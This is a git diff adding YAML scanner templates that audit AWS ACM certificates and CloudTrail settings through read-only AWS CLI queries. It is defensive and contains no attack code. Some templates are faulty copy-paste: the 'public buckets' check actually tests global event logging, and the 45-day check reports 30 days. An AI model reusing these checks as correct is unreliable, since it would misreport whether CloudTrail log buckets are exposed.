+ Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes.
+ reference:
+ - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html
+ tags: cloud,devops,aws,amazon,acm,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let arns of iterate(template.certificatearns)){
+ set("certificatearn", arns)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws acm list-certificates --region $region --certificate-statuses ISSUED --query 'CertificateSummaryList[*].CertificateArn' --output json
+
+ extractors:
+ - type: json
+ name: certificatearns
+ internal: true
+ json:
+ - '.CertificateSummaryList[] | .CertificateArn'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws acm describe-certificate --region $region --certificate-arn $certificatearn --query 'Certificate.[NotAfter, CertificateArn]' --output json | jq -r 'select((.[0] | fromdateiso8601 | mktime) - (now | mktime) < (30 * 86400)) | .[1]'
+
+ extractors:
+ - type: regex # type of the extractor
+ name: certificate
+ internal: true
+ regex:
+ - '^arn.*'
+
+ - type: dsl
+ dsl:
+ - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"'
+# digest: 4a0a004730450220756b5be6dcc7136b4b633c69403bc8a7d096c35c2a8275b99855b974e5c6ddd102210097de27a237f011112a45966e4320e15b0b9ee2af6762bd66817106963c31b0d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/acm/acm-cert-renewal-45days.yaml b/cloud/aws/acm/acm-cert-renewal-45days.yaml
new file mode 100644
index 0000000000..ea8a5647a5
--- /dev/null
+++ b/cloud/aws/acm/acm-cert-renewal-45days.yaml
@@ -0,0 +1,57 @@
+id: acm-cert-renewal-45days
+info:
+ name: ACM Certificates Pre-expiration Renewal
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure AWS ACM SSL/TLS certificates are renewed at least 45 days before expiration to prevent service disruptions.
+ impact: |
+ Failure to renew certificates timely may lead to expired certificates causing service access issues or downtimes.
+ remediation: |
+ Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes.
+ reference:
+ - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html
+ tags: cloud,devops,aws,amazon,acm,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let arns of iterate(template.certificatearns)){
+ set("certificatearn", arns)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws acm list-certificates --region $region --certificate-statuses ISSUED --query 'CertificateSummaryList[*].CertificateArn' --output json
+
+ extractors:
+ - type: json
+ name: certificatearns
+ internal: true
+ json:
+ - '.CertificateSummaryList[] | .CertificateArn'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws acm describe-certificate --region $region --certificate-arn $certificatearn --query 'Certificate.[NotAfter, CertificateArn]' --output json | jq -r 'select((.[0] | fromdateiso8601 | mktime) - (now | mktime) < (45 * 86400)) | .[1]'
+
+ extractors:
+ - type: regex # type of the extractor
+ name: certificate
+ internal: true
+ regex:
+ - '^arn.*'
+
+ - type: dsl
+ dsl:
+ - '"The AWS ACM Certificate " + certificate +" is about to expire in 30 days"'
+# digest: 490a00463044022030b5597eb0c060a9e40e23a74f07216222b2df8f53391b091624a8fb3a5fc7b8022007201e8fa3b8699eed20222e46d207fb8b271fbc1c20092e96bb5a2d3740a5d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/acm/acm-cert-validation.yaml b/cloud/aws/acm/acm-cert-validation.yaml
new file mode 100644
index 0000000000..b66e346a02
--- /dev/null
+++ b/cloud/aws/acm/acm-cert-validation.yaml
@@ -0,0 +1,56 @@
+id: acm-cert-validation
+info:
+ name: ACM Certificate Validation Check
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure ACM SSL/TLS certificates are properly validated during issue or renewal, indicating secure communication channels.
+ impact: |
+ Lack of validation may allow unauthorized certificates, leading to potential man-in-the-middle attacks or data breaches.
+ remediation: |
+ Use AWS ACM for certificate provisioning and ensure domain validation steps are correctly followed for each certificate issued or renewed.
+ reference:
+ - https://docs.aws.amazon.com/acm/latest/userguide/gs-acm-validate.html
+ tags: cloud,devops,aws,amazon,acm,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let arns of iterate(template.certificatearns)){
+ set("certificatearn", arns)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws acm list-certificates --region $region --output json
+
+ extractors:
+ - type: json
+ name: certificatearns
+ internal: true
+ json:
+ - '.CertificateSummaryList[] | .CertificateArn'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws acm describe-certificate --region $region --certificate-arn $certificatearn --query 'Certificate.Status'
+
+ matchers:
+ - type: word
+ words:
+ - "PENDING_VALIDATION"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The issue/renewal request for " + certificatearn + " SSL/TLS certificate was not validated"'
+# digest: 4a0a0047304502210089639de3f7c36e53216707ebb4296d7ca7744e1227c45977772e3a5a2fa492e2022032c5f3a8a70224d2aad87a042558ad554bc58170e274510715cca40dc0e67ec3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/acm/acm-wildcard-cert.yaml b/cloud/aws/acm/acm-wildcard-cert.yaml
new file mode 100644
index 0000000000..ef6e896265
--- /dev/null
+++ b/cloud/aws/acm/acm-wildcard-cert.yaml
@@ -0,0 +1,56 @@
+id: acm-wildcard-cert
+info:
+ name: Wildcard ACM Certificate Usage
+ author: princechaddha
+ severity: low
+ description: |
+ Ensure ACM certificates for specific domain names are used over wildcard certificates to adhere to best security practices, providing unique private keys for each domain/subdomain.
+ impact: |
+ Using wildcard certificates can expose your AWS environment to increased risk by potentially allowing unauthorized subdomains to be protected under the same certificate, reducing the granularity of access control and increasing the blast radius in the event of a key compromise.
+ remediation: |
+ Replace wildcard ACM certificates with single domain name certificates for each domain/subdomain within your AWS account. This enhances security by ensuring each domain/subdomain has its own unique private key and certificate.
+ reference:
+ - https://docs.aws.amazon.com/acm/latest/userguide/acm-certificate.html
+ tags: cloud,devops,aws,amazon,acm,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let arns of iterate(template.certificatearns)){
+ set("certificatearn", arns)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws acm list-certificates --region $region --certificate-statuses ISSUED --query 'CertificateSummaryList[*].CertificateArn' --output json
+
+ extractors:
+ - type: json
+ name: certificatearns
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws acm describe-certificate --region $region --certificate-arn $certificatearn --query 'Certificate.DomainName'
+
+ matchers:
+ - type: word
+ words:
+ - "*."
+
+ extractors:
+ - type: dsl
+ dsl:
+ - 'certificatearn + " AWS ACM certificate is a wildcard certificate"'
+# digest: 4a0a00473045022100f6ea9830b40920522f8151d891ae384572efefa30076cbf061bb313303abe50d022030dcf2a11227f66c51c43294228e264bf6b0eee1ae359cc2b84272c834de6351:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/aws-code-env.yaml b/cloud/aws/aws-code-env.yaml
new file mode 100644
index 0000000000..a1d4fa922d
--- /dev/null
+++ b/cloud/aws/aws-code-env.yaml
@@ -0,0 +1,53 @@
+id: aws-code-env
+info:
+ name: AWS Cloud Environment Validation
+ author: princechaddha
+ severity: info
+ description: |
+ Checks if AWS CLI is set up and all necessary tools are installed on the environment.
+ reference:
+ - https://aws.amazon.com/cli/
+ tags: cloud,devops,aws,amazone,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: code(1) && code(2)
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws sts get-caller-identity --output json
+
+ matchers:
+ - type: word
+ internal: true
+ words:
+ - '"UserId"'
+
+ extractors:
+ - type: json
+ name: account
+ internal: true
+ json:
+ - '.Account'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ jq --version >/dev/null 2>&1 && echo "jq is installed." || echo "jq is not installed."
+
+ matchers:
+ - type: word
+ words:
+ - "jq is installed"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"AWS CLI is properly configured for account \"" + account + "\" and all the necessary tools required are installed"'
+# digest: 4b0a00483046022100a05a196d8113f7a6f2a0ad341f9cecb882fe6fb7067812b6fc3d60482a736759022100a2d1867891aecfc696770bef70553de20c1cf97b6dbb29a4158fee3a08522c69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml
new file mode 100644
index 0000000000..a66f25bb45
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml
@@ -0,0 +1,56 @@
+id: cloudtrail-data-events
+info:
+ name: CloudTrail S3 Data Events Logging
+ author: princechaddha
+ severity: low
+ description: |
+ Ensure Amazon CloudTrail trails log S3 data events to monitor object-level operations like GetObject, DeleteObject, and PutObject.
+ impact: |
+ Without logging S3 data events, you lose visibility into object-level operations which could help detect unauthorized access or modifications.
+ remediation: |
+ Enable data event logging in CloudTrail for S3 buckets to ensure detailed activity monitoring and logging for better security and compliance.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-data-events-with-cloudtrail.html
+ tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail get-event-selectors --region $region --trail-name $trail --query 'EventSelectors[*].DataResources[]'
+
+ matchers:
+ - type: word
+ words:
+ - "[]"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"CloudTrail trail" + trail + " is not configured to capture resource operations performed on or within an AWS cloud resource"'
+# digest: 490a0046304402201faa9752ffea7342ad3012c17528ce7ac93a419f258bc0022f82daca0c116b060220047829932aa4d96d6a578faf2884e39bb46badf9ec8f4f4704a2cabdc2cc93a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml
new file mode 100644
index 0000000000..2c279064b7
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml
@@ -0,0 +1,56 @@
+id: cloudtrail-disabled
+info:
+ name: CloudTrail Disabled
+ author: princechaddha
+ severity: high
+ description: |
+ Ensures AWS CloudTrail is enabled in all regions to monitor and record account activity across your AWS infrastructure, enhancing security and compliance.
+ impact: |
+ Lack of region-wide CloudTrail logging can lead to insufficient visibility into account activities, hindering anomaly detection and forensic analysis.
+ remediation: |
+ Enable CloudTrail in all AWS regions through the AWS Management Console or CLI to ensure comprehensive activity logging and monitoring.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-getting-started.html
+ tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].IsMultiRegionTrail'
+
+ matchers:
+ - type: word
+ words:
+ - "false"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"CloudTrail trail" + trail + " is not configured to receive log files from all the AWS cloud regions"'
+# digest: 490a0046304402201443ece0d6b4fbc1cddf7c13cedcdea324540e873081d0b64225178ee3dc2d1402203d677bdd02490a8f5a90d8e2abfa5499df844303bd18b1c2250ee3737a6ce1c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml
new file mode 100644
index 0000000000..f33fbb19fd
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml
@@ -0,0 +1,56 @@
+id: cloudtrail-dup-logs
+info:
+ name: CloudTrail Duplicate Log Avoidance
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure CloudTrail logging is configured to prevent duplicate recording of global service events across multiple trails.
+ impact: |
+ Duplicate log entries can lead to increased storage costs and complicate log analysis and anomaly detection efforts.
+ remediation: |
+ Configure only one multi-region trail to log global service events and disable global service logging for all other trails.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html
+ tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].IncludeGlobalServiceEvents' --output json
+
+ matchers:
+ - type: word
+ words:
+ - "true"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Ensure only one trail in Amazon CloudTrail is configured for global service events to avoid duplicates: " + trail'
+# digest: 4a0a00473045022100863a23e0d723ae8fd1912b96f52fdd5a22168d4fedd110138ac6b8e75434ef83022040c6c4f2d88276a08fc5faa9c4601c70615bcf8d0969cbe2dbf642c7f8186b43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml
new file mode 100644
index 0000000000..51a2568a98
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml
@@ -0,0 +1,56 @@
+id: cloudtrail-global-disabled
+info:
+ name: CloudTrail Global Events Enablement
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure Amazon CloudTrail trails are configured to capture both regional and global API activity for enhanced security and compliance in your AWS account.
+ impact: |
+ Lacking global event logging reduces visibility across AWS services that operate at the global level, potentially missing critical security and compliance data.
+ remediation: |
+ Enable global service logging in CloudTrail by creating or updating a trail to include global services. This ensures comprehensive activity monitoring.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-create-and-update-a-trail.html
+ tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].IncludeGlobalServiceEvents'
+
+ matchers:
+ - type: word
+ words:
+ - "false"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"'
+# digest: 4a0a004730450221009edff671d27bdeaf0556428297d56afb1404ff3032d9ae4b61578c2b239ec4c502202ea0baf81ef1917992591736e8dfd44578f85f84bbb8c869fca718fecefac3c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml
new file mode 100644
index 0000000000..cdb9e2d23c
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml
@@ -0,0 +1,56 @@
+id: cloudtrail-integrated-cloudwatch
+info:
+ name: CloudTrail CloudWatch Integration
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure Amazon CloudTrail logs are integrated with CloudWatch Logs for real-time monitoring and analysis.
+ impact: |
+ Without integration, detecting and responding to critical events or unauthorized actions within AWS environment could be delayed.
+ remediation: |
+ Enable CloudTrail log file validation and configure CloudWatch Logs to monitor CloudTrail log files. Create CloudWatch Alarms for specific events of interest.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/send-cloudtrail-events-to-cloudwatch-logs.html
+ tags: cloud,devops,aws,amazon,cloudtrail,cloudwatch,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].CloudWatchLogsLogGroupArn'
+
+ matchers:
+ - type: word
+ words:
+ - "[]"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"CloudTrail trail" + trail + " is not configured to send events to CloudWatch Logs for monitoring purposes"'
+# digest: 4a0a00473045022003841e6c5e526ca9c51573554cb8b79f921518607b91025823f13325bc700fd7022100c936d849e5d2106d6079dc7524894c444881996c94755ba76bff9a313b01b47b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml
new file mode 100644
index 0000000000..7feef84f70
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml
@@ -0,0 +1,56 @@
+id: cloudtrail-log-integrity
+info:
+ name: CloudTrail Log Integrity Validation not Enabled
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure CloudTrail log file integrity validation is enabled to detect unauthorized file modifications.
+ impact: |
+ Without log file integrity validation, it's harder to detect if CloudTrail logs have been tampered with, potentially hiding malicious activity.
+ remediation: |
+ Enable log file integrity validation on all CloudTrail trails to ensure the integrity and authenticity of your logs.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html
+ tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].LogFileValidationEnabled'
+
+ matchers:
+ - type: word
+ words:
+ - "false"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The log file integrity validation is not enabled for CloudTrail trail" + trail'
+# digest: 4a0a00473045022100facdee59eb1d2eca53313cf4f8de941c2f7a0857645f153ad2a64c81b51d9a67022059981aa1842b49de13fc78b6673e74c755632f673f08c402ad66f59074cc2e37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml
new file mode 100644
index 0000000000..84ca11eca2
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml
@@ -0,0 +1,63 @@
+id: cloudtrail-logs-not-encrypted
+info:
+ name: CloudTrail Logs Not Encrypted
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure Amazon CloudTrail logs are encrypted at rest using AWS Key Management Service (KMS) to secure log data.
+ impact: |
+ Non-encrypted CloudTrail logs pose a risk of unauthorized access, compromising the integrity and confidentiality of log data.
+ remediation: |
+ Enable Server-Side Encryption (SSE) for CloudTrail logs using an AWS KMS key through the CloudTrail console or AWS CLI.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html
+ tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ set("region", template.trailregion)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].[Name, HomeRegion]' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[] | .[0]'
+
+ - type: json
+ name: trailregion
+ internal: true
+ json:
+ - '.[] | .[1]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].KmsKeyId'
+
+ matchers:
+ - type: word
+ words:
+ - "[]"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"'
+# digest: 4b0a00483046022100b39586900f3cb7a7ce2582be709c7b3d1b25bceaf0f6d35887c3a3d62bfff8d80221009aa3a72ddade09b522655349a54b6cb7e6e0ebd3b36d85b30899b283e77dc90d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml
new file mode 100644
index 0000000000..4cae24dead
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml
@@ -0,0 +1,73 @@
+id: cloudtrail-mfa-delete
+info:
+ name: CloudTrail MFA Delete
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure Amazon CloudTrail buckets have MFA Delete enabled to protect log file deletion.
+ impact: |
+ Prevents unauthorized deletion of CloudTrail logs, enhancing security and compliance.
+ remediation: |
+ Enable MFA Delete on CloudTrail buckets via the S3 console or AWS CLI.
+ reference:
+ - https://docs.aws.amazon.com/AmazonS3/latest/userguide/MultiFactorAuthenticationDelete.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ for(let BucketNames of iterate(template.buckets)){
+ set("bucket", BucketNames)
+ code(3)
+ }
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].S3BucketName'
+
+ extractors:
+ - type: json
+ name: buckets
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-versioning --bucket $bucket --query 'MFADelete'
+
+ matchers:
+ - type: word
+ words:
+ - 'null'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The MFA Delete feature is not enabled for the S3 bucket " + bucket + " associated with the CloudTrail " + trail'
+# digest: 490a00463044022042298637fc3947aaaab32dc59fb448c2c08e310bc0ca8a81f04d219b3e3643e4022029d99b37008c16622b5f08d7c27548c42cbfa80b8face6e766a180fe14abb003:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml
new file mode 100644
index 0000000000..d206f2aed3
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml
@@ -0,0 +1,57 @@
+id: cloudtrail-mgmt-events
+info:
+ name: CloudTrail Management Events Logging Not Enabled
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensures Amazon CloudTrail trails are configured to log management events, capturing crucial API calls and console actions for security and audit purposes.
+ impact: |
+ Failure to log management events can lead to insufficient audit trails, hindering the ability to investigate and respond to suspicious activities.
+ remediation: |
+ Enable management event logging in CloudTrail by creating a new trail or updating existing trails to include management events.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-management-and-data-events-with-cloudtrail.html
+ tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config
+
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail get-event-selectors --region $region --trail-name $trail --query 'EventSelectors[*].IncludeManagementEvents'
+
+ matchers:
+ - type: word
+ words:
+ - "false"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"CloudTrail trail" + trail + " is not configured to capture management operations performed on your AWS cloud resources"'
+# digest: 4a0a00473045022071c61afb61f0c431e2f7edf10563f582ede9a3a52e70a847ac8c6423758f5777022100e921cca38de3640c42ba86369837d9015c0b7b371c218eac3281f789392f77bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml
new file mode 100644
index 0000000000..6a8584340e
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml
@@ -0,0 +1,56 @@
+id: cloudtrail-public-buckets
+info:
+ name: Public CloudTrail Buckets
+ author: princechaddha
+ severity: critical
+ description: |
+ Identifies AWS CloudTrail S3 buckets that are publicly accessible, risking exposure of sensitive log data.
+ impact: |
+ Unauthorized access to CloudTrail logs can lead to data leakage, compromising the integrity and confidentiality of cloud operations.
+ remediation: |
+ Restrict S3 bucket access using bucket policies or IAM policies to ensure that CloudTrail logs are not publicly accessible.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].IncludeGlobalServiceEvents'
+
+ matchers:
+ - type: word
+ words:
+ - "false"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"'
+# digest: 4a0a00473045022039127acbaf7f578247fb47cdfe1a2fdd2a67e57bca815a7786011743df98451c022100c8e1b247da863d14ae8ba023a1f7d05ea77faf28cc1d1c4eb5752c0976d54b0b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml
new file mode 100644
index 0000000000..ef93d42d16
--- /dev/null
+++ b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml
@@ -0,0 +1,73 @@
+id: cloudtrail-s3-bucket-logging
+info:
+ name: CloudTrail S3 Logging
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure AWS CloudTrail logs are captured in S3 buckets with Server Access Logging enabled for audit and forensic purposes.
+ impact: |
+ Without S3 Server Access Logging for CloudTrail, tracking unauthorized access or modifications to CloudTrail logs becomes difficult, impacting incident response and forensic analysis.
+ remediation: |
+ Enable Server Access Logging on the S3 bucket used by CloudTrail. Configure the logging feature to capture all requests made to the CloudTrail bucket.
+ reference:
+ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html
+ tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
